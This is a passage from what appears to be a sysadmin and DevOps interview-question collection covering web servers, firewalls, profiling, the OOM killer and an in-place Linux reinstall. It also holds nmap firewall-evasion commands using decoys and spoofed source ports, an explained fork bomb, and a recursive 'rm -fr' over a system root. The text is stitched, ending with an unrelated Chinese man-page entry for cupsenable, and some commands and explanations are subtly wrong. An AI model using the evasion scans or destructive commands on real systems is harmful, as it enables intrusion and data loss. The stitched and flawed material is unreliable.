it’s completely unnecessary. **Security and permission loss** Allowing individual users to modify the configuration of a server using `.htaccess` can cause security concerns if not taken care properly. If you add any directive in the `.htaccess` file, it will be considered as they are added to Apache configuration file. This means it may be possible for non-admins to write these files and thus 'undo' all of your security. If you need to do something that is temporary, `.htaccess` is a good place to do it, if you need to do something more permanent, just put it in your `/etc/apache/sites-available/site.conf` (or `httpd.conf` or whatever your server calls). **Summary** You should avoid using `.htaccess` files completely if you have access to httpd main server config file. If it worked in `.htaccess`, it will work in your virtual host `.conf` file as well. If you cannot avoid using `.htaccess` files, you should follow these rules. - use only one `.htaccess` file or as few as possible - place the `.htaccess` file in the site root directory - keep your `.htaccess` file short and simple Useful resources: - [Like Apache: .htaccess](https://www.nginx.com/resources/wiki/start/topics/examples/likeapache-htaccess/) - [Don't Use .htaccess Unless You Must](https://www.danielmorell.com/guides/htaccess-seo/basics/dont-use-htaccess-unless-you-must) </details> <details> <summary><b>Is it safe to use SNI SSL in production? How to test connection with and without it? In which cases it is useful?</b></summary><br> With <b>OpenSSL</b>: ```bash # Testing connection to remote host (with SNI support) echo | openssl s_client -showcerts -servername google.com -connect google.com:443 # Testing connection to remote host (without SNI support) echo | openssl s_client -connect google.com:443 -showcerts ``` With <b>GnuTLS</b>: ```bash # Testing connection to remote host (with SNI support) gnutls-cli -p 443 google.com # Testing connection to remote host (without SNI support) gnutls-cli --disable-sni -p 443 google.com ``` </details> <details> <summary><b>How are cookies passed in the HTTP protocol?</b></summary><br> The server sends the following in its response header to set a cookie field: `Set-Cookie:name=value` If there is a cookie set, then the browser sends the following in its request header: `Cookie:name=value` </details> <details> <summary><b>How to prevent processing requests in web server with undefined server names? No defined default server name rule can be security issue? ***</b></summary><br> To be completed. </details> <details> <summary><b>You should rewrite POST with payload to an external API but the POST requests loose the parameters passed on the URL. How to fix this problem (e.g. in Nginx) and what are the reasons for this behavior?</b></summary><br> The issue is that external redirects will never resend **POST** data. This is written into the HTTP spec (check the `3xx` section). Any client that does do this is violating the spec. **POST** data is passed in the body of the request, which gets dropped if you do a standard redirect. Look at this: ``` +-------------------------------------------+-----------+-----------+ | | Permanent | Temporary | +-------------------------------------------+-----------+-----------+ | Allows changing the request method from | 301 | 302 | | POST to GET | | | | Does not allow changing the request | 308 | 307 | | method from POST to GET | | | +-------------------------------------------+-----------+-----------+ ``` You can try with the HTTP status code **307**, a RFC compliant browser should repeat the post request. You just need to write a Nginx rewrite rule with HTTP status code **307** or **308**: ```bash location / { proxy_pass http://localhost:80; client_max_body_size 10m; } location /api { # HTTP 307 only for POST method. if ($request_method = POST) { return 307 https://api.example.com?request_uri; } # You can keep this for non-POST requests. rewrite ^ https://api.example.com?request_uri permanent; client_max_body_size 10m; } ``` HTTP Status code **307** or **308** should be used instead of **301** because it changes the request method from **POST** to **GET**. Useful resources: - [Redirection on Apache (Maintain POST params)](https://stackoverflow.com/questions/17295085/redirection-on-apache-maintain-post-params) - [Why doesn't HTTP have POST redirect?](https://softwareengineering.stackexchange.com/questions/99894/why-doesnt-http-have-post-redirect) </details> <details> <summary><b>What is the proper way to test NFS performance? Prepare a short checklist. </b></summary><br> The best benchmark is always "the application(s) that you normally use". The load on a NFS system when you have 20 people simultaneously compiling a Linux kernel is completely different from a bunch of people logging in at the same time or the accounts uses as "home directories for the local web-server". But we have some good tools for testing this. - <b>boonie</b> - a classical performances evaluation tool tests. The main program tests database type access to a single file (or a set of files if you wish to test more than 1G of storage), and it tests creation, reading, and deleting of small files which can simulate the usage of programs such as Squid, INN, or Maildir format email. - <b>DBench</b> - was written to allow independent developers to debug and test SAMBA. It is heavily inspired of the original SAMBA tool. - <b>IOZone</b> - performance tests suite. POSIX and 64 bits compliant. This tests is the file system test from the L.S.E. Main features: POSIX async I/O, Mmap() file I/O, Normal file I/O Single stream measurement, Multiple stream measurement, Distributed file server measurements (Cluster) POSIX pthreads, Multi-process measurement selectable measurements with fsync, O_SYNC Latency plots. </details> <details> <summary><b>You need to block several IPs from the same subnet. What is the most efficient way for the system to traverse the iptables rule set or the black-hole route?</b></summary><br> If you have a system with thousands of routes defined in the routing table and nothing in the iptables rules than it might actually be more efficient to input an iptables rule. In most systems however the routing table is fairly small, in cases like this it is actually more efficient to use null routes. This is especially true if you already have extensive iptables rules in place. Assuming you're blocking based on source address and not destination, then doing the **DROP** in **raw/PREROUTING** would work well as you would essentially be able to drop the packet before any routing decision is made. Remember however that iptables rules are essentially a linked-list and for optimum performance when blocking a number of addresses you should use an `ipset`. On the other hand if blocking by destination, there is likely little difference between blocking at the routing table vs iptables **EXCEPT** if source IPs are spoofed in which case the blackholed entries may consume routing cache resources; in this case, **raw/PREROUTING** remains preferable. Your outgoing route isn't going to matter until you try to send a packet back to the attacker. By that time you will have already incurred most of the cost of socket setup and may even have a thread blocking waiting for the kernel to conclude you have no route to host, plus whatever error handling your server process does when it concludes there's a network problem. iptables or another firewall will allow you to block the incoming traffic and discard it before it reaches the daemon process on your server. It seems clearly superior in this use case. ```bash iptables -A INPUT -s 192.168.200.0/24 -j DROP ``` When you define a route on a Linux/Unix system it tells the system in order to communicate with the specified IP address you will need to route your network communication to this specific place. When you define a null route it simply tells the system to drop the network communication that is designated to the specified IP address. What this means is any TCP based network communication will not be able to be established as your server will no longer be able to send an SYN/ACK reply. Any UDP based network communication however will still be received; however your system will no longer send any response to the originating IP. While iptables can accept tens of thousands of rules in a chain, the chains are walked sequentially until a match is found on every packet. So, lots of rules can lead to the system spending amazing amounts of CPU time walking through the rules. The routing rules are much simpler than iptables. With iptables, a match can be based on many different variables including protocols, source and destination packets, and even other packets that were sent before the current packet. In routing, all that matters is the remote IP address, so it's very easy to optimize. Also, many systems have a lot of routing rules. A typical system may only have 5 or 10, but something that's acting as a BGP router can have tens of thousands. So, for a very long time there have been extensive optimizations in selecting the right route for a particular packet. In less technical terms this means your system will receive data from the attackers but no longer respond to it. ```bash ip route add blackhole 192.168.200.0/24 ``` or ```bash ip route add 192.168.200.0/24 via 127.0.0.1 ``` Useful resources: - [The difference between iptables DROP and null-routing.](https://www.tummy.com/blogs/2006/07/27/the-difference-between-iptables-drop-and-null-routing/) </details> <details> <summary><b>How to run <code>scp</code> with a second remote host?</b></summary><br> With `ssh`: ```bash ssh user1@remote1 'ssh user2@remote2 "cat file"' > file ``` With `tar` (with compression): ```bash ssh user1@remote1 'ssh user2@remote2 "cd path2; tar cj file"' | tar xj ``` With `ssh` and port forwarding tunnel: ```bash # First, open the tunnel ssh -L 1234:remote2:22 -p 45678 user1@remote1 # Then, use the tunnel to copy the file directly from remote2 scp -P 1234 user2@localhost:file . ``` </details> <details> <summary><b>How can you reduce load time of a dynamic website?</b></summary><br> - webpage optimization - cached web pages - quality web hosting - compressed text files - apache/nginx tuning </details> <details> <summary><b>What types of dns cache working when you type api.example.com in your browser and press return?</b></summary><br> Browser checks if the domain is in its cache (to see the DNS Cache in Chrome, go to `chrome://net-internals/#dns`). When this cache fails, it simply asks the OS to resolve the domain. The OS resolver has it's own cache which it will check. If it fails this, it resorts to asking the OS configured DNS servers. The OS configured DNS servers will typically be configured by DHCP from the router where the DNS servers are likely to be the ISP's DNS servers configured by DHCP from the internet gateway to the router. In the event the router has it's own DNS servers, it may have it's own cache otherwise you should be directed straight to your ISP's DNS servers most typically as soon as the OS cache was found to be empty. Useful resources: - [What happens when...](https://github.com/alex/what-happens-when) - [DNS Explained - How Your Browser Finds Websites](https://scotch.io/tutorials/dns-explained-how-your-browser-finds-websites) - [Firefox invalidate dns cache](https://stackoverflow.com/questions/13063496/firefox-invalidate-dns-cache) </details> <details> <summary><b>What is the difference between <code>Cache-Control: max-age=0</code> and <code>Cache-Control: no-cache</code>?</b></summary><br> **When sent by the origin server** `max-age=0` simply tells caches (and user agents) the response is stale from the get-go and so they SHOULD revalidate the response (e.g. with the If-Not-Modified header) before using a cached copy, whereas, `no-cache` tells them they MUST revalidate before using a cached copy. In other words, caches may sometimes choose to use a stale response (although I believe they have to then add a Warning header), but `no-cache` says they're not allowed to use a stale response no matter what. Maybe you'd want the SHOULD-revalidate behavior when baseball stats are generated in a page, but you'd want the MUST-revalidate behavior when you've generated the response to an e-commerce purchase. **When sent by the user agent** If a user agent sends a request with `Cache-Control: max-age=0` (aka. "end-to-end revalidation"), then each cache along the way will revalidate its cache entry (e.g. with the If-Not-Modified header) all the way to the origin server. If the reply is then 304 (Not Modified), the cached entity can be used. On the other hand, sending a request with `Cache-Control: no-cache` (aka. "end-to-end reload") doesn't revalidate and the server MUST NOT use a cached copy when responding. </details> <details> <summary><b>What are the security risks of setting <code>Access-Control-Allow-Origin</code>?</b></summary><br> By responding with <code>Access-Control-Allow-Origin: *</code>, the requested resource allows sharing with every origin. This basically means that any site can send an XHR request to your site and access the server’s response which would not be the case if you hadn’t implemented this CORS response. So any site can make a request to your site on behalf of their visitors and process its response. If you have something implemented like an authentication or authorization scheme that is based on something that is automatically provided by the browser (cookies, cookie-based sessions, etc.), the requests triggered by the third party sites will use them too. </details> <details> <summary><b>Create a single-use TCP or UDP proxy with <code>netcat</code>.</b></summary><br> ```bash ### TCP -> TCP nc -l -p 2000 -c "nc [ip|hostname] 3000" ### TCP -> UDP nc -l -p 2000 -c "nc -u [ip|hostname] 3000" ### UDP -> UDP nc -l -u -p 2000 -c "nc -u [ip|hostname] 3000" ### UDP -> TCP nc -l -u -p 2000 -c "nc [ip|hostname] 3000" ``` </details> <details> <summary><b>Explain 3 techniques for avoiding firewalls with <code>nmap</code>.</b></summary><br> **Use Decoy addresses** ```bash # Generates a random number of decoys. nmap -D RND:10 [target] # Manually specify the IP addresses of the decoys. nmap -D decoy1,decoy2,decoy3 ``` In this type of scan you can instruct Nmap to spoof packets from other hosts.In the firewall logs it will be not only our IP address but also and the IP addresses of the decoys so it will be much harder to determine from which system the scan started. **Source port number specification** ```bash nmap --source-port 53 [target] ``` A common error that many administrators are doing when configuring firewalls is to set up a rule to allow all incoming traffic that comes from a specific port number.The <code>--source-port</code> option of Nmap can be used to exploit this misconfiguration.Common ports that you can use for this type of scan are: 20, 53 and 67. **Append Random Data** ```bash nmap --data-length 25 [target] ``` Many firewalls are inspecting packets by looking at their size in order to identify a potential port scan.This is because many scanners are sending packets that have specific size.In order to avoid that kind of detection you can use the command <code>--data-length</code> to add additional data and to send packets with different size than the default. **TCP ACK Scan** ```bash nmap -sA [target] ``` It is always good to send the ACK packets rather than the SYN packets because if there is any active firewall working on the remote computer then because of the ACK packets the firewall cannot create the log, since firewalls treat ACK packet as the response of the SYN packet. Useful resources: - [Nmap - Techniques for Avoiding Firewalls](https://pentestlab.blog/2012/04/02/nmap-techniques-for-avoiding-firewalls/) </details> ###### Devops Questions (5) <details> <summary><b>Explain how Flap Detection works in Nagios?</b></summary><br> **Flapping** occurs when a service or host changes state too frequently, this causes lot of problem and recovery notifications. Once you have defined **Flapping**, explain how Nagios detects **Flapping**. Whenever Nagios checks the status of a host or service, it will check to see if it has started or stopped flapping. Nagios follows the below given procedure to do that: - storing the results of the last 21 checks of the host or service analyzing the historical check results and determine where state changes/transitions occur - using the state transitions to determine a percent state change value (a measure of change) for the host or service - comparing the percent state change value against low and high flapping thresholds </details> <details> <summary><b>What are the advantages that Containerization provides over Virtualization?</b></summary><br> Below are the advantages of containerization over virtualization: - containers provide real-time provisioning and scalability but VMs provide slow provisioning - containers are lightweight when compared to VMs - VMs have limited performance when compared to containers - containers have better resource utilization compared to VMs </details> <details> <summary><b>Is the way of distributing Docker apps (e.g. Apache, MySQL) from Docker Hub is good for production environments? Describe security problems and possible solutions. ***</b></summary><br> To be completed. </details> <details> <summary><b>Some of the common use cases of LXC and LXD come from the following requirements... Explain.</b></summary><br> - the need for an isolated development environment without polluting your host machine - isolation within production servers and the possibility to run more than one service in its own container - a need to test things with more than one version of the same software or different operating system environments - experimenting with different and new releases of GNU/Linux distributions without having to install them on a physical host machine - trying out a software or development stack that may or may not be used after some playing around - installing many types of software in your primary development machine or production server and maintaining them on a longer run - doing a dry run of any installation or maintenance task before actually executing it on production machines - better utilization and provisioning of server resources with multiple services running for different users or clients - high-density virtual private server (VPS) hosting, where isolation without the cost of full virtualization is needed - easy access to host hardware from a container, compared to complicated access methods from virtual machines - multiple build environments with different customizations in place </details> <details> <summary><b>You have to prepare a Redis cluster. How will you ensure security?</b></summary><br> - protect a given Redis instance from outside accesses via firewall - binding it to 127.0.0.1 if only local clients are accessing it - sandboxed environment - enabling **AUTH** - enabling **Protected Mode** - data encryption support (e.g. `spiped`) - disabling of specific commands - users **ACLs** Useful resources: - [Redis Security](https://redis.io/topics/security) - [A few things about Redis security](http://antirez.com/news/96) </details> ###### Cyber Security Questions (5) <details> <summary><b>What is OWASP Application Security Verification Standard? Explain in a few points. ***</b></summary><br> To be completed. </details> <details> <summary><b>What is CSRF?</b></summary><br> **Cross Site Request Forgery** is a web application vulnerability in which the server does not check whether the request came from a trusted client or not. The request is just processed directly. It can be further followed by the ways to detect this, examples and countermeasures. </details> <details> <summary><b>What is the difference between policies, processes and guidelines?</b></summary><br> As **security policy** defines the security objectives and the security framework of an organisation. A **process** is a detailed step by step how to document that specifies the exact action which will be necessary to implement important security mechanism. **Guidelines** are recommendations which can be customized and used in the creation of procedures. </details> <details> <summary><b>What is a false positive and false negative in case of IDS?</b></summary><br> When the device generated an alert for an intrusion which has actually not happened: this is **false positive** and if the device has not generated any alert and the intrusion has actually happened, this is the case of a **false negative**. </details> <details> <summary><b>10 quick points about web server hardening.</b></summary><br> Example: - if machine is a new install, protect it from hostile network traffic, until the operating system is installed and hardened - create a separate partition with the `nodev`, `nosuid`, and `noexec` options set for `/tmp` - create separate partitions for `/var`, `/var/log`, `/var/log/audit`, and `/home` - enable randomized virtual memory region placement - remove legacy services (e.g. `telnet-server`, `rsh`, `rlogin`, `rcp`, `ypserv`, `ypbind`, `tftp`, `tftp-server`, `talk`, `talk-server`). - limit connections to services running on the host to authorized users of the service via firewalls and other access control technologies - disable source routed packet acceptance - enable **TCP/SYN** cookies - disable SSH root login - install and configure **AIDE** - install and configure **OSsec HIDS** - configure **SELinux** - all administrator or root access must be logged - integrity checking of system accounts, group memberships, and their associated privileges should be enabled and tested - set password creation requirements (e.g. with PAM) Useful resources: - [Security Harden CentOS 7](https://highon.coffee/blog/security-harden-centos-7/) - [CentOS 7 Server Hardening Guide](https://www.lisenet.com/2017/centos-7-server-hardening-guide/) </details> ## <a name="secret-knowledge">Secret Knowledge</a> ### :diamond_shape_with_a_dot_inside: <a name="guru-sysadmin">Guru Sysadmin</a> <details> <summary><b>Explain what is Event-Driven architecture and how it improves performance? ***</b></summary><br> To be completed. </details> <details> <summary><b>An application encounters some performance issues. You should to find the code we have to optimize. How to profile app in Linux environment?</b></summary><br> > Ideally, I need an app that will attach to a process and log periodic snapshots of: memory usage number of threads CPU usage. 1. You can use `top`in batch mode. It runs in the batch mode either until it is killed or until N iterations is done: ```bash top -b -p `pidof a.out` ``` or ```bash top -b -p `pidof a.out` -n 100 ``` 2. You can use ps (for instance in a shell script): ```bash ps --format pid,pcpu,cputime,etime,size,vsz,cmd -p `pidof a.out` ``` > I need some means of recording the performance of an application on a Linux machine. 1. To record performance data: ```bash perf record -p `pidof a.out` ``` or to record for 10 secs: ```bash perf record -p `pidof a.out` sleep 10 ``` or to record with call graph (): ```bash perf record -g -p `pidof a.out` ``` 2) To analyze the recorded data ```bash perf report --stdio perf report --stdio --sort=dso -g none perf report --stdio -g none perf report --stdio -g ``` **This is an example of profiling a test program** 1. I run my test program (c++): ```bash ./my_test 100000000 ``` 2. Then I record performance data of a running process: ```bash perf record -g -p `pidof my_test` -o ./my_test.perf.data sleep 30 ``` 3. Then I analyze load per module: ```bash perf report --stdio -g none --sort comm,dso -i ./my_test.perf.data # Overhead Command Shared Object # ........ ....... ............................ # 70.06% my_test my_test 28.33% my_test libtcmalloc_minimal.so.0.1.0 1.61% my_test [kernel.kallsyms] ``` 4. Then load per function is analyzed: ```bash perf report --stdio -g none -i ./my_test.perf.data | c++filt # Overhead Command Shared Object Symbol # ........ ....... ............................ ........................... # 29.30% my_test my_test [.] f2(long) 29.14% my_test my_test [.] f1(long) 15.17% my_test libtcmalloc_minimal.so.0.1.0 [.] operator new(unsigned long) 13.16% my_test libtcmalloc_minimal.so.0.1.0 [.] operator delete(void*) 9.44% my_test my_test [.] process_request(long) 1.01% my_test my_test [.] operator delete(void*)@plt 0.97% my_test my_test [.] operator new(unsigned long)@plt 0.20% my_test my_test [.] main 0.19% my_test [kernel.kallsyms] [k] apic_timer_interrupt 0.16% my_test [kernel.kallsyms] [k] _spin_lock 0.13% my_test [kernel.kallsyms] [k] native_write_msr_safe ... ``` 5. Then call chains are analyzed: ```bash perf report --stdio -g graph -i ./my_test.perf.data | c++filt # Overhead Command Shared Object Symbol # ........ ....... ............................ ........................... # 29.30% my_test my_test [.] f2(long) | --- f2(long) | --29.01%-- process_request(long) main __libc_start_main 29.14% my_test my_test [.] f1(long) | --- f1(long) | |--15.05%-- process_request(long) | main | __libc_start_main | --13.79%-- f2(long) process_request(long) main __libc_start_main ... ``` So at this point you know where your program spends time. Also the simple way to do app profile is to use the `pstack` utility or `lsstack`. Other tool is Valgrind. So this is what I recommend. Run program first: ```bash valgrind --tool=callgrind --dump-instr=yes -v --instr-atstart=no ./binary > tmp ``` Now when it works and we want to start profiling we should run in another window: ```bash callgrind_control -i on ``` This turns profiling on. To turn it off and stop whole task we might use: ```bash callgrind_control -k ``` Now we have some files named callgrind.out.* in current directory. To see profiling results use: ```bash kcachegrind callgrind.out.* ``` I recommend in next window to click on **Self** column header, otherwise it shows that `main()` is most time consuming task. Useful resources: - [Tracing processes for fun and profit](http://techblog.rosedu.org/tracing-processes-for-fun-and-profit.html) </details> <details> <summary><b>Using a Linux system with a limited number of packages installed, and telnet is not available. Use sysfs virtual filesystem to test connection on all interfaces (without loopback).</b></summary><br> For example: ```bash #!/usr/bin/bash for iface in $(ls /sys/class/net/ | grep -v lo) ; do if [[ $(cat /sys/class/net/$iface/carrier) = 1 ]] ; then state=1 ; fi done if [[ $state -ne 0 ]] ; then echo "not connection" > /dev/stderr ; exit ; fi ``` </details> <details> <summary><b>Write two golden rules for reducing the impact of hacked system.</b></summary><br> 1) **The principle of least privilege** You should configure services to run as a user with the least possible rights necessary to complete the service's tasks. This can contain a hacker even after they break in to a machine. As an example, a hacker breaking into a system using a zero-day exploit of the Apache webserver service is highly likely to be limited to just the system memory and file resources that can be accessed by that process. The hacker would be able to download your html and php source files, and probably look into your mysql database, but they should not be able to get root or extend their intrusion beyond apache-accessible files. Many default Apache webserver installations create the 'apache' user and group by default and you can easily configure the main Apache configuration file (`httpd.conf`) to run apache using those groups. 2) **The principle of separation of privileges** If your web site only needs read-only access to the database, then create an account that only has read-only permissions, and only to that database. **SElinux** is a good choice for creating context for security, `app-armor` is another tool. **Bastille** was a previous choice for hardening. Reduce the consequence of any attack, by separating the power of the service that has been compromised into it own "Box". 3) **Whitelist, don't blacklist** You're describing a blacklist approach. A whitelist approach would be much safer. An exclusive club will never try to list everyone who can't come in; they will list everyone who can come in and exclude those not on the list. Similarly, trying to list everything that shouldn't access a machine is doomed. Restricting access to a short list of programs/IP addresses/users would be more effective. Of course, like anything else, this involves some trade-offs. Specifically, a whitelist is massively inconvenient and requires constant maintenance. To go even further in the tradeoff, you can get great security by disconnecting the machine from the network. **Also interesting are**: Use the tools available. It's highly unlikely that you can do as well as the guys who are security experts, so use their talents to protect yourself. - public key encryption provides excellent security - enforce password complexity - understand why you are making exceptions to the rules above - review your exceptions regularly - hold someone to account for failure, it keeps you on your toes Useful resources: - [How to prevent zero day attacks (original)](https://serverfault.com/questions/391370/how-to-prevent-zero-day-attacks) </details> <details> <summary><b>You're on a security conference. Members debating about putting up the OpenBSD firewall on the core of the network. Go to the podium and express your opinion about this solution. What are the pros/cons and why? ***</b></summary><br> To be completed. </details> <details> <summary><b>Is there a way to allow multiple cross-domains using the Access-Control-Allow-Origin header in Nginx?</b></summary><br> To match a list of domain and subdomain this regex make it ease to work with fonts: ```bash location ~* \.(?:ttf|ttc|otf|eot|woff|woff2)$ { if ( $http_origin ~* (https?://(.+\.)?(domain1|domain2|domain3)\.(?:me|co|com)$) ) { add_header "Access-Control-Allow-Origin" "$http_origin"; } } ``` More slightly configuration: ```bash location / { if ($http_origin ~* (^https?://([^/]+\.)*(domainone|domaintwo)\.com$)) { set $cors "true"; } # Nginx doesn't support nested If statements. This is where things get slightly nasty. # Determine the HTTP request method used if ($request_method = 'GET') { set $cors "${cors}get"; } if ($request_method = 'POST') { set $cors "${cors}post"; } if ($cors = "true") { # Catch all in case there's a request method we're not dealing with properly add_header 'Access-Control-Allow-Origin' "$http_origin"; } if ($cors = "trueget") { add_header 'Access-Control-Allow-Origin' "$http_origin"; add_header 'Access-Control-Allow-Credentials' 'true'; add_header 'Access-Control-Allow-Methods' 'GET, POST, OPTIONS'; add_header 'Access-Control-Allow-Headers' 'DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type'; } if ($cors = "truepost") { add_header 'Access-Control-Allow-Origin' "$http_origin"; add_header 'Access-Control-Allow-Credentials' 'true'; add_header 'Access-Control-Allow-Methods' 'GET, POST, OPTIONS'; add_header 'Access-Control-Allow-Headers' 'DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type'; } } ``` </details> <details> <summary><b>Explain <code>:(){ :|:& };:</code> and how stop this code if you are already logged into a system?</b></summary><br> It's a **fork bomb**. - `:()` - this defines the function. `:` is the function name and the empty parenthesis shows that it will not accept any arguments - `{ }` - these characters shows the beginning and end of function definition - `:|:` - it loads a copy of the function `:` into memory and pipe its output to another copy of the `:` function, which has to be loaded into memory - `&` - this will make the process as a background process, so that the child processes will not get killed even though the parent gets auto-killed - `:` - final `:` will execute the function again and hence the chain reaction begins The best way to protect a multi-user system is to use **PAM** to limit the number of processes a user can use. We know the biggest problem with a fork bomb is the fact it takes up so many processes. So we have two ways of attempting to fix this, if you are already logged into the system: - execute a **SIGSTOP** command to stop the process: `killall -STOP -u user1` - if you can't run at the command line you will have to use `exec` to force it to run (due to processes all being used): `exec killall -STOP -u user1` With fork bombs your best method for this is preventing from being to big of an issue in the first place. </details> <details> <summary><b>How to recover deleted file held open e.g. by Apache?</b></summary><br> If a file has been deleted but is still open, that means the file still exists in the filesystem (it has an inode) but has a hard link count of 0. Since there is no link to the file, you cannot open it by name. There is no facility to open a file by inode either. Linux exposes open files through special symbolic links under `/proc`. These links are called `/proc/12345/fd/42` where 12345 is the **PID** of a process and 42 is the number of a file descriptor in that process. A program running as the same user as that process can access the file (the read/write/execute permissions are the same you had as when the file was deleted). The name under which the file was opened is still visible in the target of the symbolic link: if the file was `/var/log/apache/foo.log`, then the target of the link is `/var/log/apache/foo.log (deleted)`. Thus you can recover the content of an open deleted file given the **PID** of a process that has it open and the descriptor that it's opened on like this: ```bash recover_open_deleted_file () { old_name=$(readlink "$1") case "$old_name" in *' (deleted)') old_name=${old_name%' (deleted)'} if [ -e "$old_name" ]; then new_name=$(TMPDIR=${old_name%/*} mktemp) echo "$oldname has been replaced, recovering content to $new_name" else new_name="$old_name" fi cat <"$1" >"$new_name";; *) echo "File is not deleted, doing nothing";; esac } recover_open_deleted_file "/proc/$pid/fd/$fd" ``` If you only know the process **ID** but not the descriptor, you can recover all files with: ```bash for x in /proc/$pid/fd/* ; do recover_open_deleted_file "$x" done ``` If you don't know the process **ID** either, you can search among all processes: ```bash for x in /proc/[1-9]*/fd/* ; do case $(readlink "$x") in /var/log/apache/*) recover_open_deleted_file "$x";; esac done ``` You can also obtain this list by parsing the output of `lsof`, but it isn't simpler nor more reliable nor more portable (this is Linux-specific anyhow). </details> <details> <summary><b>The team of admins needs your support. You must remotely reinstall the system on one of the main servers. There is no access to the management console (e.g. iDRAC). How to install Linux on disk, from and where other Linux exist and running?</b></summary><br> It is possible that the question should be: "_System installation from the level and in place of already other system working_". On the example of the Debian GNU/Linux distribution. 1. Creating a working directory and downloading the system using the debootstrap tool. ```bash _working_directory="/mnt/system" mkdir $_working_directory debootstrap --verbose --arch amd64 {wheezy|jessie} . http://ftp.en.debian.org/debian ``` 2. Mounting sub-systems: `proc`, `sys`, `dev` and `dev/pts`. ```bash for i in proc sys dev dev/pts ; do mount -o bind $i $_working_directory/$i ; done ``` 3. Copy system backup for restore. ```bash cp system_backup_22012015.tgz $_working_directory/mnt ``` However, it is better not to waste space and do it in a different way (assuming that the copy is in `/mnt/backup`): ```bash _backup_directory="${_working_directory}/mnt/backup" mkdir $_backup_directory && mount --bind /mnt/backup $_backup_directory ``` 4. Chroot to "new" system. ```bash chroot $_working_directory /bin/bash ``` 5. Updating information about mounted devices. ```bash grep -v rootfs /proc/mounts > /etc/mtab ``` 6. In the "new" system, the next thing to do is mount the disk on which the "old" system is located (e.g. `/dev/sda1`). ```bash _working_directory="/mnt/old_system" _backup_directory="/mnt/backup" mkdir $_working_directory && mount /dev/sda1 $_working_directory ``` 7. Remove all files of the old system. ```bash for i in $(ls | awk '!(/proc/ || /dev/ || /sys/ || /mnt/)') ; do rm -fr $i ; done ``` 8. The next step is to restore the system from a backup. ```bash tar xzvfp $_backup_directory/system_backup_22012015.tgz -C $_working_directory ``` 9. And mount `proc`, `sys`, `dev` and `dev/pts` in a new working directory. ```bash for i in proc sys dev dev/pts ; do mount -o bind $i $_working_directory/$i ; done ``` 10. Install and update grub configuration. ```bash chroot $_working_directory /bin/bash -c "grub-install --no-floppy --root-directory=/ /dev/sda" chroot $_working_directory /bin/bash -c "update-grub" ``` 11. Unmount `proc`, `sys`, `dev` and `dev/pts` filesystems. ```bash cd grep $_working_directory /proc/mounts | cut -f2 -d " " | sort -r | xargs umount -n ``` None of the available commands, i.e. `halt`, `shutdown` or `reboot`, will work. You need to reload the system configuration - to do this, use the **kernel debugger** (without the '**b**' option): ```bash echo 1 > /proc/sys/kernel/sysrq echo reisu > /proc/sysrq-trigger ``` Of course, it is recommended to fully restart the machine in order to completely load the current system. To do this: ```bash sync ; reboot -f ``` </details> <details> <summary><b>Rsync triggered Linux OOM killer on a single 50 GB file. How does the OOM killer decide which process to kill first? How to control this?</b></summary><br> Major distribution kernels set the default value of `/proc/sys/vm/overcommit_memory` to zero, which means that processes can request more memory than is currently free in the system. If memory is exhaustively used up by processes, to the extent which can possibly threaten the stability of the system, then the **OOM killer** comes into the picture. NOTE: It is the task of the **OOM Killer** to continue killing processes until enough memory is freed for the smooth functioning of the rest of the process that the Kernel is attempting to run. The **OOM Killer** has to select the best process(es) to kill. Best here refers to that process which will free up the maximum memory upon killing and is also the least important to the system. The primary goal is to kill the least number of processes that minimizes the damage done and at the same time maximizing the amount of memory freed. To facilitate this, the kernel maintains an `oom_score` for each of the processes. You can see the oom_score of each of the processes in the `/proc` filesystem under the pid directory. > When analyzing OOM killer logs, it is important to look at what triggered it. ```bash cat /proc/10292/oom_score ``` The higher the value of `oom_score` of any process, the higher is its likelihood of getting killed by the **OOM Killer** in an out-of-memory situation. If you want to create a special control group containing the list of processes which should be the first to receive the **OOM killer's** attention, create a directory under `/mnt/oom-killer` to represent it: ```bash mkdir lambs ``` Set `oom.priority` to a value high enough: ```bash echo 256 > /mnt/oom-killer/lambs/oom.priority ``` `oom.priority` is a 64-bit unsigned integer, and can have a maximum value an unsigned 64-bit number can hold. While scanning for the process to be killed, the **OOM-killer** selects a process from the list of tasks with the highest `oom.priority` value. Add the PID of the process to be added to the list of tasks: ```bash echo <pid> > /mnt/oom-killer/lambs/tasks ``` To create a list of processes, which will not be killed by the **OOM-killer**, make a directory to contain the processes: ```bash mkdir invincibles ``` Setting `oom.priority` to zero makes all the process in this cgroup to be excluded from the list of target processes to be killed. ```bash echo 0 > /mnt/oom-killer/invincibles/oom.priority ``` To add more processes to this group, add the pid of the task to the list of tasks in the invincible group: ```bash echo <pid> > /mnt/oom-killer/invincibles/tasks ``` Useful resources: - [Rsync triggered Linux OOM killer on a single 50 GB file](https://serverfault.com/questions/724469/rsync-triggered-linux-oom-killer-on-a-single-50-gb-file) - [Taming the OOM killer](https://lwn.net/Articles/317814/) </details> <details> <summary><b>You have a lot of sockets, hanging in <code>TIME_WAIT</code>. Your http service behind proxy serve a lot of small http requests. How to check and reduce <code>TIME_WAIT</code> sockets? ***</b></summary><br> To be completed. Useful resources: - [How to reduce number of sockets in TIME_WAIT?](https://serverfault.com/questions/212093/how-to-reduce-number-of-sockets-in-time-wait) </details> <details> <summary><b>How do <code>SO_REUSEADDR</code> and <code>SO_REUSEPORT</code> differ? Explain all socket implementations. ***</b></summary><br> To be completed. </details>
sec-knowleage
cupsenable === 启动指定的打印机 ## 补充说明 **cupsenable命令** 用于启动指定的打印机。 ### 语法 ```shell cupsenable(选项)(参数) ``` ### 选项 ```shell -E:当连接到服务器时强制使用加密; -U:指定连接服务器时使用的用户名; -u:指定打印任务所属的用户; -h:指定连接的服务器名和端口号; ``` ### 参数 目标:指定目标打印机。
sec-knowleage
